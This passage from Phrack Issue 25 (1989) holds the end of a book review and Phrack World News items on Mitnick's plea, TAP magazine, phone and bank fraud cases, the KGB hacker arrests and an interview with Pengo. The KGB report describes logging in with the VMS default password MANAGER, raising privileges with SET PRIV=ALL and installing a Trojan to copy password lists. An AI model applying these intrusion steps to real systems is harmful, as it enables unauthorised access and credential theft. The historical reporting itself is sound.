"hacker" only serves to further muddy the waters.  To some this may be a minor
point, but the indiscriminate and apparently uninformed use of terms and labels
is ill advised in a book that aspires to be a useful reference manual.

By way of illustration, I've excerpted his definitions (actually, they should
properly be called "descriptions") of various terms from the glossary:

     Hacker:  A non-business computer user who operates a computer in
              conjunction with a modem and who at least knows his (or her) way
              around a local bulletin board and has at least heard of
              CompuServe and The Source.  Can usually be found eating pizza or
              donuts, and has a working knowledge of the effects of long term
              exposure to great amounts of caffeine either from drinking
              several softdrinks (sic) or numerous cups of coffee.

     Cracker:  A hacker who has an adventurous streak which leads him into
               unknown computer menus and strange protocols of all benign.  He
               has the ability to crack access codes or passwords in order to
               illegally enter a computer over the telephone.  Usually a very
               good problem solver, quick to think, cautious to act.  Often
               thought of as clever or even sneaky.  Excellent chess players.

     Chrasher:  A cracker gone bad.  One who gets his jollies from terminating
                corporate systems and picking on helpless bulletin boards by
                destroying information or files or by rendering a system unable
                to communicate (usually referred to as "crashing" the system)
                until reset by a sysop.  Very clever, extremely dangerous.
                Smart, but hopelessly misdirected.  They deserve respect for
                their ability to destroy.

     Pirate:  Software pirate.  A hacker who concentrates his efforts toward
              cracking software copyright protection schemes which are placed
              on computer disks to prevent the illegal copying of factory
              produced programs.  Some pirates have a habit of collecting
              software that they have managed to crack either to trade with
              other pirates for software they don't have yet or just to collect
              it for the sake of building their egos.  Some of my best friends
              are pirates.  Usually, very easy going people, and sometimes
              politically minded as well.  And even more clever than crackers
              or crashers.

The problem with these definitions is that they are not mutually exclusive and
do little but reinforce the stereotypes that hackers, phreakers, and pirates
already face.  Any phreak/hacker that reads this book will give these
definitions little attention, if they read them at all, but if this manual is
used by the media as an "example of hacker literature" it will only further
perpetuate some of these assumptions.

A large amount of the book is dedicated to what Xet calls The Gray Pages.
Labeled as a "national hackers' phone book" it is primarily a list of dialups
for Telenet, Tymnet, Compuserve, and The Source.  This list is hardly "secret"
and the format hints that it may just be a capture of the "info" pages from
each of these networks.  These numbers may be helpful to the beginner, but it
would have been better if he included instructions on how to dial the toll free
access number (or call customer service and just ask them) and check for your
local number by yourself.  Not only would this have cut down on the number of
pages needed, but it would have at least given the beginner an excuse to
actually do something themselves.  (Not to mention that is the best way to get
the most accurate information.)

The rest of "The Gray Pages" is taken up by a list of 400 public BBS systems.
Although the list is titled "hacker bulletin boards" many of the systems listed
are quite legitimate and do not support phreak/hack or pirate activities.  Woe
to the beginner who calls CLAUG and starts asking for plans to a blue box.  Of
course the biggest draw back to this list is that it was probably fifty percent
out of date four months after it was printed.

Speaking of blue box plans, Xet does offer a short list of box colors and what
they do.  No plans for boxes are included, nor is there a discussion of DTMF
tones or other common phreak knowledge.  He does include simple schematics and
operating instructions for a tap indicator, wire recorder, and a data converter
(for use with the wire recorder).  The introduction to this section, called
"gray market equipment" says that future editions of the book will include box
schematics.

Finally, there is a short section called "helpful stuff" written by "The ICH."
This section is pretty informative but offers little clarifying information.
Basically it includes an ASCII table, DTMF frequencies, satellite and cellular
frequencies, and a short discussion of packet switching networks.

In summary, "Hacking:  What's Legal And What's Not" offers some very basic
information to the beginning hacker, a quite good (although potentially
outdated) review of relevant state and federal computer crime laws, and a few
tid-bits here and there that are worth knowing.  But it also wastes a lot of
space to bulletin boards and dialup numbers that are of little use to anyone.
Experienced phreak/hackers and pirates will find a few articles that are not
available elsewhere (like the section on "How Hackers Think" where Xet says
that since a San Diego BBS poll indicated that 79% of "hackers" had the
astrological sign of Leo all one has to do to understand hackers is read a
profile of Leo's!) but the vast majority of the information is old news in a
new format.

For someone who wants to get a broad overview of the computer underground I can
recommend this book.  But if someone is looking for information of any real
use, I suggest you contact your local phreak/hack BBS and use the G-philes they
have available.  You won't be missing anything this book has to offer.  E.
Arthur Brown's price of $12.95 offers a reasonable value, and if your looking
to develop a "hacker library" you might consider ordering a copy.
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                     Volume Three, Issue 25, File 9 of 11

            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
            PWN                                                 PWN
            PWN        P h r a c k   W o r l d   N e w s        PWN
            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
            PWN                Issue XXV/Part 1                 PWN
            PWN                                                 PWN
            PWN                 March 29, 1989                  PWN
            PWN                                                 PWN
            PWN          Created, Written, and Edited           PWN
            PWN               by Knight Lightning               PWN
            PWN                                                 PWN
            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN


Standing On The Edge Of The Network
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greetings once again and welcome to Phrack World News Issue 25, our 25th
Anniversary Special.

This issue features articles about the New TAP Magazine, a battle between
Southwestern Bell and bulletin board operators in Oklahoma City, a whole file's
worth of information about the KGB hackers, Matthias Speer, Klaus Brunnstein,
an interview with Pengo, and much more.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Suiting Up For SummerCon '89                                     March 22, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Once again, for those who may have missed last issue...

                                 SummerCon '89
                             Saint Louis, Missouri
                               June 23-25, 1989

                               Brought To You By
                 Forest Ranger / Knight Lightning / Taran King

The agenda for this year's SummerCon is going to be a sort of mixture of the
first two.  We do intend to hold an actual conference on Saturday, June 24,
1989.  This conference will last as long as necessary and anyone who wishes to
speak should prepare a presentation ahead of time and notify us as soon as
possible.

The location of SummerCon '89 has been decided upon, but reservations are still
in the progress of being made.  For this reason, we have declined to print the
name of the hotel for the convention at this time.  Anyone who is seriously
interested in going to SummerCon '89 and thinks that they will be able to
attend should contact Taran King or myself as soon as possible.

:Knight Lightning
_______________________________________________________________________________

Mitnick Plea Bargains                                            March 16, 1989
~~~~~~~~~~~~~~~~~~~~~
By Kim Murphy (Los Angeles Times [Excerpts Only])

Kevin Mitnick pleaded guilty to one count of computer fraud and one count of
possessing unauthorized long-distance telephone codes.  He admitted penetrating
a DEC computer in Mass., secretly obtaining a copy of a sophisticated computer
security program which the company had spent $1 million to develop.

The program, said Mitnick's attorney, was designed to alert companies when
their computers had been penetrated by hackers like Mitnick.  Mitnick never
attempted to sell or distribute the program, he said.  Mitnick also admitted
possessing 16 unauthorized MCI long-distance codes that enabled him to make
long-distance telephone calls without charge.  A prosecutor said Mitnick used
the codes to make connections to computers.

Mitnick faces one year in prison.  Under a plea agreement with the government,
he must also submit to three years' supervision by probation officers after his
release from prison.  Prosecutors said they agreed to a 12-month sentence
because the amount of financial damage was relatively low.  DEC lost about
$100,000 to $200,000 in computer "down time" investigating the security program
theft.

As part of the plea agreement, prosecutors agreed to dismiss two additional
counts charging Mitnick with illegally accessing the Leeds University computer
in England and separate charge related to the DEC computer program.
_______________________________________________________________________________

The NEW Technological Advancement Party (TAP)                    March 11, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By Aristotle and the TAP Magazine Staff


How TAP Will Be Printed

TAP will be created, edited, and printed on various machines that the staff
either owns or has full access to.  The computers range from personal computers
to mainframes.

The printing devices range from dot-matrix printers to industrial laser
printers.  Again, the staff has full access to all of these devices.  In order
to upgrade the quality of print and to take some of the load off of the staff,
the staff is looking into getting TAP printed by a professional printer.


Funding Of TAP

Hopefully TAP will be funded majorly by the subscribers.  Unlike TAP in it's
early years, we cannot afford to just give TAP away.  Except for issue 92, we
will not GIVE TAP away for free.  We feel the policy of the old TAP towards
this issue was the major cause of their cronic shortage of money.  As far as
startup costs, the staff can support all costs except for Printing, Paper, and
Postage.  For 1.00 an issue, we feel we should be able to sufficiently support
TAP from the subscribers fees.  All money received will be put into an account
that will be used for TAP purposes ONLY.  There will be no distributing of
wealth between the staff.  The three expenses above will be the major areas of
spending with an occasional expense of advertising and such.


How TAP Will Be Getting Articles

As of right now, the staff has enough articles ready to be printed to support
TAP for at least 4 issues.  We hope TAP will become dependant on articles
submitted by subscribers.  If people do not submit articles to TAP, we will be
forced to fill up space with lesser articles (thus lessening the quality of
TAP.)  We figure that at the worst, TAP can sustain itself for one year with NO
submitted articles.  That way we will not be ripping anyone off and we can fade
away in peace. (Hopefully we won't have to do that!)


Who is involved with TAP

As of 03/07/89, the TAP staff consists of five people.  These 'staffers' are:
Aristotle, Olorin The White, Predat0r, and two others that wish to remain
anonymous.  The last two have elected to remain anonymous for various reasons,
one being to maintain their freedom.  The staff does not feel that we need to
list names in TAP (yet) to give the newsletter a good reputation.  We feel that
readers should subscribe to TAP because of the quality of the newsletter and
not because of the staff members.  Of course, if you submit an article, you
will be given credit where it is due.  Credit to the author of any article we
print will be given unless the author expresses wishes that he/she does not
want to be recognized.  Of course if TAP cannot find the name of the author of
a specific article, we cannot print the credits.


Why We Decided To Print A Newsletter

After gathering information from bulletin boards and other sources, various
members of the staff decided that they would like to print hard to obtain
information in hardcopy form and an easy to understand format.  We feel that
certain information cannot be successfully represented and distributed with
computers only.  One excellent example is a schematic of any device.  We all
know how bad ASCII schematics suck.  And with practically everyone in the
community owning a different computer, how can we communicate efficiently?
Well, printed material (on paper) is our answer.

In addition to the advantage print has over text files, there are various other
reasons for our wanting to print a newsletter.  Due to the lack of experts
wanting to teach newcomers to the community (excluding certain individuals), we
have decided to do something about it.  TAP will attempt to explain information
so that EVERYONE can understand it.  We will not hesitate to help any
beginners, nor hesitate to give information to the more experienced members of
the community.  All members of the community will be supported by TAP.  TAP is
an equal opportunity informer.


Why We Decided To Print TAP

When we first received our collection of TAP issues (along with some 2600's),
we were astounded.  After learning from bbs's and voice calls, the value of TAP
and 2600 were obvious.  We liked 2600 a lot, but we LOVED TAP.  TAP fit our
personalities perfectly.  It has something for everyone.  Around that time, we
promptly looked into subscribing to the two magazines.  As you know, TAP died
in 1984 and 2600 is still in print.  Well, we subscribed to 2600 and kept on
studying our old TAP issues.  When the suggestion came to put out a magazine,
the first idea that was suggested was TAP.  It was decided after a LONG
discussion that TAP would be perfect for our newsletter.  Since we are
interested in hacking, phreaking, AND other topics, we felt TAP better
expressed our opinions and ideas than any other newsletter idea.  Hell, we just
straight up loved that old TAP and we cannot pass up the opportunity to bring
it back into existence and (hopefully) it's original glory.


Where To Find TAP

If you have any other questions regarding TAP, you can contact the staff via
snail mail (US postal service) or via staff accounts on the bulletin boards
listed below.

US Mailing Address:                   TAP
                                P.O. Box 20264
                             Louisville, KY 40220

Beehive BBS - 703-823-6591
Hackers Den - 718-358-9209
Ripco       - 312-528-5020


Thank you,    Tap Staff

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Editor's Comments
~~~~~~~~~~~~~~~~~
Upon first hearing about the newly formed TAP Magazine, I scoffed and thought
it would be another pipe dream like many other countless previous attempts.  To
my surprise, the magazine was delivered just like they promised.

Issue 92 contained the following:

TAP RAP - Basically the staff's remarks about the new magazine and the
          subscription information.

A BIT on BITNET (An Introduction to BITNET) - This was a reprint of Aristotle's
                Bitnet file that appeared in P/HUN Newsletter Issue 3.

BELL PAYS for Evil deeds - News article about Cincinnati Bell Telephone Co.

TMC PIN - Information about PIN codes of TeleMarketing Company.

Pyro-How To - How to make Nitrogen Tri-Iodide.

Miscellaneous catalog information for Loompanics Unlimited and Specialized
Products Company.

Big Brother section - An article about revenge tactics and social engineering
                      taken from Flagship News (employee publication of
                      American Airlines).  The article was also previously seen
                      in RISKS Digest.

TELEPHONE CONTROLLED TAPE STARTER + Schematics

The infamous "Ma Bell Is A Cheap Mother" logo and a few other surprises are
also included in this issue.  The last part of the newsletter lists
information that the TAP Staff is looking for.

My reaction to the issue was positive over all.  The print quality was very
good and extremely readable.  The issue itself was a bit crumpled up by the US
Postal Service, but that is to be expected.  The first issue was a test
product and that is the reason for a little bit of un-original material, says
Aristotle.

It is my understanding that the future holds all sorts of neat articles and
overall it would appear that at $12.00 a year, the new TAP is a good
investment.

:Knight Lightning
_______________________________________________________________________________

Two Men Seized As Phone Looters                                  March 13, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Two phony repairmen wearing stolen Illinois Bell hardhats and carrying around
stolen repairman tools have demonstrated that ripping off payphones is not
small change.

Arrested in Chicago, Illinois last week were George W. Parratt, age 47, of Sauk
Village, IL and Arthur P. Hopkinson, age 40, of Hickory Hills, IL; two south
suburbs of Chicago.

The two men, posing as Illinois Bell repairmen and driving a white and blue van
disguised to look like an Illinois Bell truck, have stolen thousands of dollars
from pay telephones all over Chicago.  Their average take was about $200 per
phone -- and they have hit some phones two or three times.

Just the cost of repairing the phones damaged in the past year cost more than
$50,000 said Illinois Bell Telephone spokesman Tony Abel.

These two fellows were making a full time living looting pay phones, although
Mr. Abel did not have the final total of the amount looted immediately
available when we discussed the case.

Abel said Illinois Bell employees spotted the phony van on two separate days
and notified the security department of Bell.  Security representatives were
able to trace the license plate on the van, and they found it parked in
Parratt's driveway.  The investigators secretly followed the van and watched
Parratt and Hopkinson loot two pay phones in Calumet City, Illinois, and two in
Hammond, Indiana; a community on the stateline served by Illinois Bell.

When the two men drove back across the stateline into Calumet City, and started
breaking into another payphone, the investigators arrested them.  Cook County
sheriff's Lt. Thomas Oulette, called to the scene, said the two had $120 in
change and $650 in stolen tools from Illinois Bell at the time of their arrest.
He said they were able to break into a coin box, dump it and get away in less
than three minutes.

"It was a pretty good scam," said Oulette, who noted that the investigators
from Illinois Bell told him they believed the company had been hit by the pair
for about $35,000 in the nine months the company was specifically aware of them
without knowing who they were.

Parratt and Hopkinson were released on bond, and are scheduled to appear in
Circuit Court (Markham, Illinois branch) on April 17, 1989.

                    Information Provided by Patrick Townson
_______________________________________________________________________________

Bank Fraud Was "Easy"                                         February 24, 1989
~~~~~~~~~~~~~~~~~~~~~
>From The Independent (London)

"A 17-year-old junior cashier cheated the National Westminster Bank out of 1
million pounds in a computer fraud," a court heard yesterday.

Judge Helen Palin criticized the bank for lax security and refused to make a
compensation order for 15,000 pounds which the bank has not been able to
recover.

After being given access to the bank's computer system he began by paying 10
pounds into his own account.  He then paid himself 12,000 in imaginary cheques.
Later, he transferred a credit for 984,252 pounds into the account of a friend
and celebrated by buying 50 bottles of champagne.

The judge said, "One of the worrying features of this case is that a young man
who hasn't long left school is able to work the system in the NatWest bank on a
number of occasions without being found out.  Indeed, the general chat within
the bank seems to be how easy it is to defraud that bank."
_______________________________________________________________________________

Two Men Accused Of "Hacker" Crime                             February 24, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
By James Gribble (Milwaukee Journal)

Vowing to step up efforts to stop computer crime, a Milwaukee County prosecutor
has charged two Milwaukee men with fraudulently obtaining free long-distance
telephone service.

The felony charges filed Thursday against Alan Carr, age 35 and David Kelsey,
age 26 are the first so-called hacker crimes to be prosecuted by the district
attorney's office.

Working independently, using home computers and similar software programs, the
men are alleged to have obtained calling card codes for customers of an
independent long-distance telephone company, Schneider Communications.

They then used the codes to bill their personal calls to Schneider's customers,
according to a criminal complaint prepared by Assistant District Attorney Jon
N. Reddin, head of the district attorney's White Collar Crime Unit.

Reddin said the total theft probably was less than $1,000, but he said the case
reflected a growing problem.

"I have the feeling, from our investigation, that there's a lot of people out
there doing this," he said.  "The only way to stop it is to prosecute them,
because this is theft.  It's almost like some one stealing your credit card and
using it to make purchases."

Schneider Communications was the victim in this case, Reddin said, because the
company had to write off the customer billings for which Carr and Kelsey turned
out to be responsible.

According to court records and Reddin, the investigation was prompted by a
complaint from Schneider Communications.

The company's computer keeps track of all calls that are rejected because of an
improper access code.  Clients dialing incorrectly would cause 10 to 30
rejected calls a month, but sometime last year the number jumped to 1,000 or
2,000 per month.

Computer printouts showed the unknown parties were repeatedly dialing the
computer and changing the access code sequentially, Reddin said.  Hundreds of
calls at a time were being made in this fashion, and each time the code was
changed one digit at a time until a working code was encountered.

Because the company had no way of knowing where the calls were coming from,
Wisconsin Bell placed a tracing device on the line, through which the calls
were traced to the phone numbers of Carr and Kelsey.

The men were apparently unaware of each other and simply happened to be
involved in similar schemes, Reddin said.

Carr is alleged to have used a bootleg computer program called "Hacking
Construction Set Documentation."  Kelsey is alleged to have used a similar
bootleg program called "Mickey-Dialer."  The programs were seized in raids at
the defendant's houses, according to court records.

Reddin acknowledged that technological safeguards can detect such thefts after
the fact but not prevent them.  What Carr and Kelsey are alleged to have done
can be done by any computer buff with the right software and know-how, Reddin
said.

The key to deterring computer crime, in Reddin's view, lies in it's prompt
reporting to authorities.

"The best way I can think of to do that is by filing a complaint with our
office," Reddin said.
_______________________________________________________________________________


--------------------------------------------------------------------------------


                                ==Phrack Inc.==

                    Volume Three, Issue 25, File 10 of 11

            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN
            PWN                                                 PWN
            PWN        P h r a c k   W o r l d   N e w s        PWN
            PWN        ~~~~~~~~~~~   ~~~~~~~~~   ~~~~~~~        PWN
            PWN                Issue XXV/Part 2                 PWN
            PWN                                                 PWN
            PWN                 March 29, 1989                  PWN
            PWN                                                 PWN
            PWN          Created, Written, and Edited           PWN
            PWN               by Knight Lightning               PWN
            PWN                                                 PWN
            PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN


German Hackers Break Into Los Alamos and NASA                     March 2, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Three hours ago, a famous German TV-magazine revealed maybe one of the greatest
scandals of espionage in computer networks:  They talk about some (three to
five) West German hackers breaking into several secret data networks (Los
Alamos, Nasa, some military databases, (Japanese) war industry, and many
others) in the interests of the KGB, USSR.  They received sums of $50,000 to
$100,000 and even drugs, all from the KGB, the head of the political
television-magazine said.

The following news articles (and there are a lot) all deal with (directly and
indirectly) the recent Spy scandal situation that occurred in West Germany.
The majority of the articles shown here are taken from RISKS Digest, but they
have been edited for this presentation.

This presentation contains some information not previously seen (at least not
in this format).
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Computer Espionage:  Three "Wily Hackers" Arrested                March 2, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Three hackers have been arrested in Berlin, Hamburg and Hannover, and they are
accused of computer espionage for the Soviet KGB.  According to the television
magazine "Panorama" (whose journalists have first published the NASA and SPAN
hacks), they intruded scientific, military and industry computers and gave
passwords, access mechanisms, programs and data to 2 KGB officers; among
others, intrusion is reported of the NASA headquarters, the Los Alamos and
Fermilab computers, the United States Chief of Staff's data bank OPTIMIS, and
several more army computers.  In Europe, computers of the French-Italian arms
manufacturer Thomson, the European Space Agency ESA, the Max Planck Institute
for Nuclear Physics in Heidelberg, CERN/GENEVA and the German Electron
Accelerator DESY/Hamburg are mentioned.  The report says that they earned
several 100,000 DM plus drugs (one hacker evidently was drug addict) over about
3 years.

For the German Intelligence authorities, this is "a new quality of espionage."
The top manager said that they had awaited something similar but are
nevertheless surprised that it happened so soon and with such broad effects.

Summarizing the different events which have been reported earlier -- NASA and
SPAN hacks, Clifford Stoll's report of the "Wily Hacker" -- I regard this as
essentially the final outcome of the Wily Hackers story (with probably more
than the 3 which have now been imprisoned).  It is surprising that the
Intelligence authorities needed so long time (after Cliff's Communications Of
The ACM report, in May 1988) to finally arrest and accuse these crackers.
Moreover, the rumors according to which design and production plans of a
Megabit chip had been stolen from Philips/France computers seems to become
justified; this was the background that CCC hacker Steffen Wernery had been
arrested, for several months, in Paris without being accused.  CAD/CAM programs
have also been sold to KBG.

                            Information Provided By
                               Klaus Brunnstein
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Computer Spy Ring Sold Top Secrets To Russia                      March 3, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
West German counter-intelligence has uncovered a spy ring centered on computer
hackers suspected of having supplied the Soviet Union with top secret military
and economic information.

They are said to have penetrated computer networks in the United States,
Western Europe and Japan, according to a television report last night.

In a special program, the North German Broadcasting Network said that thousands
of computer codes, passwords and programs which allowed the Soviet Union access
to major computer centers in the Western world have been passed on by the
hackers.  They had been recruited by the KGB in 1985 and are alleged to have
supplied the information in return for money and drugs.

In Karlsruhe, the West German Chief Public Prosecutor's Office, which is in
charge of spy cases, would only confirm last night that three arrests have been
made March 2nd during house searches in Hannover and West Berlin.

Those detained were suspected of "having obtained illegally, through hacking
and in exchange for money, information which was passed on to an Eastern secret
service."

But the spokesman did not share West German television's evaluation, which said
the case was the most serious since the unmasking in 1974 of an East German
agent in the office of ex-Chancellor Willy Brandt.  The Interior Ministry in
Bonn last night also confirmed several arrests and said the suspects had
supplied information to the KGB.  The arrests followed months of investigations
into the activities of young computer freaks based in Hamburg, Hannover and
West Berlin, the ministry said.

According to the television report, the hackers gained access to the data banks
of the Pentagon, NASA Space Center, and the nuclear laboratory in Los Alamos.

They also penetrated leading West European computer centers and armament
companies, including the French Thomson group, the European Nuclear Research
Center, CERN, in Geneva; the European Space Authority, ESA, and German
companies involved in nuclear research.

The Russians are alleged to have put pressure on the hackers because of their
involvement with drugs, and to have paid several hundred thousands marks for
information, the program said.

West German security experts on the evening of March 2nd described the new spy
case as "extremely grave."  The KGB has been provided with a "completely new
possibility of attack" on Western high technology and NATO military secrets.
The sources said it was "sensational" that the hackers should have succeeded in
penetrating the US defense data systems from Western Europe.

The North German Broadcasting Network program said its research was based on
information given by two members of the suspected espionage ring.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
KGB Computer Break-Ins Alleged In West Germany                    March 3, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Taken From the International Herald Tribune

Bonn - Three West German computer hackers have been arrested on suspicion of
infiltrating computer networks worldwide to obtain secret data for an East
block intelligence service, prosecutors said on March 2nd.

A spokesman for the federal prosecutor, Alexander Prechtel, confirmed that
three men were arrested, but did not identify the East Block country involved
or the networks infiltrated.

The ARD television networks "Panorama" program, the thrust of which the
spokesman confirmed, said the hackers had passed secrets from a range of highly
sensitive U.S., French, and West German computer networks to the KGB, the
Soviet secret police.

The television report said it was the worst such espionage case to be uncovered
in West Germany since the 1974 exposure of Guenter Guillaume, an East German
spy who was a top aide to Willy Brandt, then the West German chancellor.

Among the systems believed to have been infiltrated were the U.S.:  Defense
Department's staff data bank, the U.S. nuclear arms laboratory in Los Alamos,
New Mexico, the National Aeronautics and Space Administration, and U.S.
military supply depots.

The report said other systems entered were at the French arms and electronics
company Thomson SA, a European nuclear-research center in Geneva, the European
Space Agency and the Max-Planck Institute for Nuclear Physics in West Germany.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
News From The KGB/Wily Hackers                                    March 7, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Now, five days after the "sensational" disclosure of the German (NDR) Panorama
Television team, the dust of speculations begins to rise and the facts become
slowly visible; moreover, some questions which could not be answered in
Clifford Stoll's Communications of the ACM paper may now be answered.  Though
not all facts are known publicly, the following facts seem rather clear.

    - In 1986, some hackers from West Berlin and Hannover discussed, in "hacker
      parties" with alcohol and drugs, how to solve some personal financial
      problems; at that time, first intrusions of scientific computers
      (probably CERN/Geneva as hacker training camp) and Chaos Computer Club's
      spectacular BTX-intrusion gave many hackers (assisted by newsmedia) the
      *puerile impression* that they could intrude *into every computer
      system*; I remember contemporary discussions on 1986/87 Chaos Computer
      Conferences about possibilities, when one leading CCC member warned that
      such hacks might also attract espionage (Steffen Wernery recently
      mentioned that German counter-espionage had tried several times to hire
      him and other CCC members as advisors -- unsuccessfully).

    - A "kernel group" of 5 hackers who worked together, in some way, in the
      "KGB case" are (according to Der SPIEGEL, who published the following
      names in its Monday, March 6, 1989 edition):

      -> Markus Hess, 27, from Hannover, Clifford Stoll's "Wily Hacker" who was
         often referred to as the Hannover Hacker and uses the alias of Mathias
         Speer; after having ended (unfinished) his studies in mathematics, he
         works as programmer, and tries to get an Informatics diploma at the
         University of Hagen (FRG); he is said to have good knowledge of VMS
         and UNIX.

      -> Karl Koch, 23, from Hannover, who works as programmer; due to his
         luxurious lifestyle and his drug addiction, his permanent financial
         problems have probably added to his desire to sell "hacker knowledge"
         to interested institutions.

      -> Hans Huebner, alias "Pengo," from Berlin, who after having received
         his Informatics diploma from Technical University of West Berlin,
         founded a small computer house; the SPIEGEL writes that he needed
         money for investment in his small enterprise; though he does not
         belong to the Chaos Computer Club, he holds close contacts to the
         national hacker scenes (Hamburg: Chaos Computer Club; Munich: Bavarian
         Hacker Post; Cologne: Computer Artists Cologne, and other smaller
         groups), and he was the person to speak about UUCP as a future
         communications medium at the Chaos Communication Congress.

      -> Dirk Brezinski, from West Berlin, programmer and sometimes
         "troubleshooter" for Siemens BS-2000 systems (the operating system of
         Siemens mainframe computers), who earned, when working for Siemens or
         a customer (BfA, a national insurance for employees) 20,000 DM (about
         $10,800) a month; he is regarded (by an intelligence officer) as "some
         kind of a genius."

      -> Peter Carl, from West Berlin, a former croupier, who "always had
         enough cocaine."  No information about his computer knowledge or
         experience is available.

After successfully stimulating KGB's interest, the group (mainly Hess and Koch)
committed their well-documented hacks [See Clifford Stoll's "Stalking the Wily
Hacker," Communications of the ACM, May 1988].  SPIEGEL writes that the group
*sold 5 diskettes full of passwords*, from May to December 1986, to KGB
officers which they met in East Berlin; when Bremen University computer center,
their favorite host for transatlantic hacks, asked the police to uncover the
reasons for their high telephone bills, they stopped the action.

This statement of Der SPIEGEL is probably wrong because, as Cliff describes,
the "Wily Hacker" successfully worked until early 1988, when the path from his
PC/telephone was disclosed by TYMNET/German Post authorities.  The German
public prosecutors did not find enough evidence for a trial, when examining
Hess' apartment; moreover, they had acquired the material in illegal actions,
so the existing evidence could not be used and finally had to be scratched!

In Hess' apartment, public prosecutors found (on March 3, 1989) password lists
from other hacks.  On Monday, March 6, 1989, the Panorama team (who had
disclosed the NASA hack and basically the KGB connection) asked Klaus
Brunnstein to examine some of the password lists; the material which he saw
(for 30 minutes) consisted of about 100 photocopied protocols of a hack during
the night of July 27 to 28, 1987; it was the famous "NASA hack."  From a VAX
750 (with VMS 4.3), which they entered via DATEX-P (the German packed-switched
data-exchange network, an X.25 version), where they evidently previously had
installed a Trojan horse (UETFORT00.EXE), they tried, via SET HOST... to
log-into other VAXes in remote institutes.  They always used SYSTEM account and
the "proper" password (invisible).

Remark:  Unfortunately, DEC's installation procedure works only if a SYSTEM
         account is available; evidently, most system managers do not change
         the preset default password MANAGER; since Version 4.7, MANAGER is
         excluded, but on previous VMS versions, this hole probably exists in
         many systems!

Since the hackers, in more than 40% of the cases, succeeded to login, their
first activities were to SET PRIV=ALL; SET PRIO=9, and then to install (via
trans-net copy) the Trojan horse.  With the Trojan horse (not displayed under
SHow Users), they copied the password lists to their PCs.  When looking through
the password list, Klaus observed the well-known facts:  More than 25% female
or male first names, historical persons, countries, cities, or local dishes (in
the Universities of Pisa, Pavia, and Bologna, INSALATA was/is a favorite
password of several people).  Only in CASTOR and POLLUX, the password lists
contained less than 5% passwords of such nature easy to guess!

Apart from many (about 39) unsuccessful logins, many different CERN/GENEVA,
NASA systems (CASTOR, POLLUX, Goddard and Ames Space Flight Centers), several
USA, GB, French, Italian and some German institutes connected in SPAN were
"visited."  The documented session was from July 27, 10 p.m. to July 28, 1 a.m.

The media report that other hacks (probably not all committed by Hess and Koch
themselves) were sold to KGB.  Among them, Electronic and Computer Industry
seem to be of dominant interest for the USSR.  If special CAD/CAM programs and
Megabit designs (especially from Thomson/France, from VAX systems) have been
stolen, the advantage and value for the USSR cannot be (over)estimated.

In FRG, the current discussion is whether the hackers succeeded to get into
"kernel areas" or only "peripheral areas."  This discussion is ridiculous since
most "peripheral systems" contain developments (methods, products) for future
systems, while the "kernel systems" mainly contain existing applications (of
past architectures).

The well-known hackers (especially CCC) have been seriously attacked by some
media.  My best guess is that CCC was itself *a victim* because the group
succeeded to informally get much of the information which they needed for some
of the hacks, and which they finally sold to KGB.  Apart from "Pengo," there
doesn't seem to be a close relation between CCC and the KGB/Wily Hackers.
Nevertheless, CCC and others, like Cheshire Catalyst in the USA, have prepared
a climate where espionage inevitably sprang-off.

                            Information Provided By
                               Klaus Brunnstein
_______________________________________________________________________________

Pengo Speaks Out About The KGB Hackers And More                  March 10, 1989
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The following are statements made by Pengo to Phrack Inc. during an interview
with Knight Lightning;

KL:  What is your response to the accusations of being a KGB spy?

P:   I have been involved into this espionage circle throughout some months in
     1986.  I did not actually work for the KGB, nor did I hand out hacker
     information to the East.  All my hacking activities since then have been
     for the pure purpose of personal enlightenment.  I never hid my name
     before, and I won't go undercover now that the real story comes to the
     surface.

     In the middle of 1988, I informed the West German authorities (secret
     service) about my involvement with the KGB.  This is one of the main
     reasons for the big busts last week.  I have to live with the fact that
     some hackers now think I am working for the authorities now.  I don't, and
     I will try anything to avoid getting into all these secret
     service/espionage problems again.

KL:  What about the statements made in DER SPIEGEL?

P:   They published my name and claimed that I was "very active" for the east,
     but also that I am the :most hopeful head in West Berlin's hacking scene."
     I now try to make the best out of this publicity.

KL:  Klaus Brunnstein made some strong statements about you in RISKS Digest,
     what did you think of that?

P:   It really upsets me a lot.  Klaus Brunnstein doesn't know anything
     detailed about this case, but he seems to love seeing himself as the
     insider in the German scene. At the last congress I got in kind of a
     dispute with him.  He could not understand why I, as a computer scientist,
     still support hackers.  Perhaps this is one of the reasons for his
     publication.

KL:  Any other comments?

P:   What I would be interested in hearing about the reaction to this situation
     from the United States hackers' point of view.  I have already heard that
     most people seem to believe that the whole Chaos Computer Club is an
     association of spies.  This is of course untrue.

KL:  What do you intend to do about the bad press you have received?

P:   I have posted a reply to Brunnstein's posting in RISKS (shown in next
